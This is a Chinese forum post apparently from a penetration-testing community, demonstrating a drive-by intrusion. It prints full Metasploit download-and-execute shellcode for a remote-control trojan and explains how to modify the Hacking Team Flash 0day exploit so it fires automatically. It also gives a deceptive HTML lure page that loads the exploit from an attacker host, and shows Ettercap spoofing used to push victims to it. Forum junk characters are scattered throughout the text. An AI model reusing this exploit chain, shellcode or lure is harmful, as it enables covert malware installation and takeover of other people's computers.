2 Y9 R$ }4 D6 {2 t* i1 Q 三、flash 0day之手工代码修改制作下载者实例入侵演示
利用到的工具: % P$ O* z7 R# i4 q2 z( Z
. ^0 O# H& Z; h; _ Msf . T3 a8 s7 Y9 @" c c9 {1 h% X4 W
) u4 n" g3 A$ z) {0 p( S Ettercap
9 h4 i- Z" U& ?5 p7 ]% j1 G" {7 A% R% _# y8 i% o' @& q" s8 y7 A& j6 N Adobe Flash CS6 " y4 G- f5 }6 G) N2 j
X6 W! n% n2 H) o1 s8 a Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 % W' ~+ k+ ~1 h$ E3 ~7 F9 j
+ Y2 G, G# D. j% @, V! @( O- d+ \ f, f; l3 m( ^, w! K 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options + S/ G) b6 j' d; ^( L5 X3 k
7 Q" s$ y9 j7 |$ _: C6 d p" K/ i 如图: # [% V$ g7 u* r. g
5 }8 ?! e" Z! ^7 p4 b+ u
. ]3 B2 i, A) L9 }
; Y" w0 x ~# j) g& D O, ^+ F6 V
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: $ a ^" w v4 i. W6 v
& [7 d- Z! o2 |' n+ }
) F, A) t# M! p9 ^: o$ s( _
然后执行generate -t dword生成shellcode,如下: ' i6 ?) {3 t" Q3 N
7 b t1 g/ l( ]- Q. V# X+ B& D) ?& Y
复制代码到文本下便于我们一会编辑flash exp,如下:
, p' t |/ Y, _) ~; i0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
# I; Y/ r6 \' v$ a. A& Z" W0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
% b6 K" L G( d, {" o6 |2 G% U 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 8 Y/ k# D3 ~- g& c0 e, k' ^# ^
+ \4 ~) |6 l ?0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
0 M3 i) u7 N( o( Z1 W# ^( X7 ?3 _7 W! w) g 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, ! |8 O5 V5 z3 [8 J8 U& i/ ^# s
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, - @; _2 \! V' R! G# Q
/ D+ a" x9 O8 T4 X, E; s7 ^; J3 {( n5 \0 S1 c' k' ^ 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
! @4 h& M7 Q& U& s5 t0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, % a4 e2 H: _, w5 a
) o+ P: w$ Z6 g5 ? 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, - }& T$ s# }# g# Y! x( D
$ Z5 D4 |! A+ r: ~ 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, : G6 C5 b+ o$ k. w
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
- S0 l. {+ @/ W1 `$ F6 X- V; F6 h; A5 T# q6 p. w) m 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 8 U' |( y! p. g q) d2 a6 v3 ~
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 ' v6 Q9 R# W' E6 t! P
8 m+ _2 L8 t( N. { * z; o0 p& e2 J+ ~, z
5 o- D1 n1 `4 Z- E5 D: H3 b
下面我们来修改flash 0day exp,需要修改三个文件,分别为:
- {3 C& G' r% t b
先修改ShellWin32.as,部分源代码如图: / g) ?9 `' c' o
, r/ v4 z4 K4 ~% p3 H! m
& M& ?$ d8 E, h& e2 K
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: ; U. a: O9 x) E6 |
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
* Q( r* R; u$ H( b. `! H
: Q: F2 ~# a# n( P0 J 换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
?8 Y4 d H! Y
; w3 i, I0 K+ K; S9 V) \* l
8 Z6 ^4 j7 G. w' j8 ^& d+ |+ q
& t/ I. T3 J/ c& t 然后点保存,下面我们来编译一下,打开 4 v8 O6 i* w1 u H$ i: X
- d/ Z: j! k k+ fexp1.fla然后点文件-发布,看看编译没错误 0 M; c9 D& Y7 ?5 V/ m# m1 T. q" U* v4 ~
& q; o. _ I) w( v% B) G1 U
7 ^ D" V" K2 C3 p * k7 z4 [# [$ N. m3 D
2 ^. m4 e$ k- K- ]3 M% B 5 x$ U$ F4 Y/ U. b" S) V
; e1 |& v! ?" u+ d# V+ a- Y( H0 _, S8 Y
& z2 J+ h9 [& f
& j9 `; I( Y, s' ?8 ]5 L6 f1 t5 d 然后我们把生成的
5 u) K" y; N. s exp1.swf丢到kailinux 的/var/www/html下: . |4 \$ T7 o, l( e. M, `, f
$ j( r5 z2 C% z+ S7 z 然后把这段代码好好编辑一下 , l6 o% `$ H) t+ x2 D
' J3 v: R- S8 ]* X8 V. l' j+ C- f
8 Q6 r. ]% o! ]4 v' R 7 S* A! e5 F& d$ R( s- r; l
; [* Z2 P3 m M+ _2 [: A
& S( [3 L3 }7 W9 N0 S
2 U/ v J: _; c1 H v# }0 v% O3 P
4 J2 t: b5 a: Z+ [+ C% C9 V
/ |2 M9 f9 Y/ T2 L8 `4 N* q5 i, g9 i" V <!DOCTYPE html>
<html> a) \; C( p$ D( b
7 o/ q. E2 O! C$ B* P <head> % G2 P8 d/ N* R" g
<meta http-equiv="Content-Type" content="text/html;
- v4 J* f8 Q) |6 Acharset=utf-8"/>
) Z2 D5 _2 K5 E% P' A</head> + P0 c9 w; G& V# e' ]$ F
2 }7 }* E% M6 K" [ t<body>
. N, Z0 Q0 M/ x8 a8 ~9 J0 {6 v# i7 o) S; \; K <h2> Please wait, the requested page is loading...</h2>
) ~9 D: t( @% U0 ]# Q) sn' c" j& I* i; _+ y( E <br> G; T" s/ n4 t4 r' E) _
! o7 [8 ?1 h4 [8 x' g/ |& w1 x0 P, F+ D5 q, x0 @ v <OBJECT
/ e; y/ I; z- O; E5 d$ n7 c7 q. w& H/ d# c$ m
classid="clsid
27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><
ARAM NAME=movie
7 ]) V) y* M5 f4 T+ g VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 7 c: W0 M, E6 V0 R9 l8 @- j
</body> 2 X$ T5 c" X7 c# x
8 i5 k' y. [$ b# ?% ~: @0 F' g <script> 3 b. ?3 u$ {; Z/ G8 s* h
8 k- p) r3 F' J! x- o# f D. J( s1 V: A0 R5 T6 g1 s setTimeout(function () {
1 l+ }. p, V4 I$ l: A& M( \ , t5 f/ n& p/ ]& i( G
window.location.reload(); ) D e; P' n+ ]+ v$ A
}, 10000); 0 C# E- Z" t3 h% f, d
) f0 j. W1 b* @* H
</script> ' A! O% G# n- k) ~# X
, k$ Z; {# V% M, D" _; T4 Y8 R( d9 K, U! V7 q4 p+ Z </html>
3 N. v: i- y3 i8 e- k
/ u0 h! L' c( y$ @) x# S. K注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: # K- t0 I( e: ]& q1 F. j* p8 d! ]4 O$ |
, C! }6 }8 u. k6 g4 j4 [$ G
/ T e, c, c: Y0 T# \- W( `; h
. k6 `4 f2 [% R8 `" s " Y! K/ n& z: k4 [' W. F, Z$ w
( s H, G7 c: i2 R: m+ O) H 下面我们用ettercap欺骗如图:
4 v# S' @ e) `6 _9 }5 G& \! R. m+ _7 _9 ?, r0 u ^5 q7 e
/ |/ d& j' q% y0 I$ u* m! R
- p$ [& Z. r7 T4 a2 k' l4 [ " b( C* E) {' t( d0 @4 k. y4 f
下面我们随便访问个网站看看: 7 A- v3 w9 i3 n) A
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
% C- K! \ g' p' R5 m
6 ?. w! L+ E3 F1 L 我们看另一台, # p. P @( j# e% Y z7 w. h; W
提示这个错误,说明木马是成功被下载执行了,
只是由于某些原因没上线而已。。。
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |